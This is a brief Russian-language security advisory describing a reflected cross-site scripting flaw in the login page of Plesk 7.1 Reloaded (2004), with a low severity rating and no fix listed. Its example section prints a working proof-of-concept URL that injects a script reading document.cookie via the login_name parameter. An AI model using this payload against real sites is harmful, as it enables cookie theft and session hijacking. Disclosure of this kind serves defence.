Межсайтовый скриптинг в Plesk 7.1

Дата публикации:
25.08.2004
Всего просмотров:
1063
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Plesk 7.1

Описание: Уязвимость обнаружена в Plesk 7 Reloaded. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/login_up.php3?login_n ame="><script>alert(document.cookie)</script><"&passwd=TheSur

URL производителя: http://www.sw-soft.com/en/products/plesk7reloaded/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] XSS in Plesk 7.1 Reloaded

или введите имя

CAPTCHA